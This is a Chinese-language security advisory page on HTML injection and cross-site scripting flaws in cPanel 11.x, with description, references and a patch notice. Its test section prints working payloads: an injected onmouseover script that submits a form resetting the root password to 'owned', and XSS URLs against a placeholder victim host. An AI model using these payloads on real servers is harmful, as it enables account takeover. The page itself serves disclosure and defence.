安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
cPanel HTML注入和跨站脚本漏洞
发布日期:
2008-08-05
更新日期:
2009-02-23
受影响系统:
cPanel cPanel 11.x
描述:
BUGTRAQ ID:
33840
cPanel是基于web的工具,用于自动化控制网站和服务器。
cPanel中存在多个输入验证错误,远程攻击者可以执行脚本注入和跨站脚本攻击。
1) cPanel没有正确地过滤对用户主目录中.contactemail文件的输入,如果显示了恶意邮件就会在用户浏览器会话中注入任意HTML和脚本代码。
2) cPanel没有正确地过滤对scripts2/confdkillproc脚本的输入便返回给了用户,远程攻击者可以通过跨站脚本攻击在用户浏览器会话中执行任意HTML和脚本代码。
<*来源:mckt
链接:
http://secunia.com/advisories/33990/
http://skeptikal.org/index.php?entry=entry080805-140000
http://skeptikal.org/index.php?entry=entry080809-180834
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
"onmouseover="f=document.forms[0];f.action='/scripts/passwd';f.user.value='root';f.removeChild(f.domain);d=document.createElement('input');f.appendChild(d);d.name='password';d.value='owned';d=document.createElement('input');f.appendChild(d);d.name='password2';d.value='owned';f.submit()
http://victim.com:2086/scripts2/saveuthemes?themetype=modules&${moduleName}=${versionNumber}
http://victim.com:2086/scripts2/confdkillproc?%3Cscript%3Ealert(1337)%3C/script%3E=1&trusted=
建议:
厂商补丁:
cPanel
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cpanel.net
浏览次数:
2375
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客
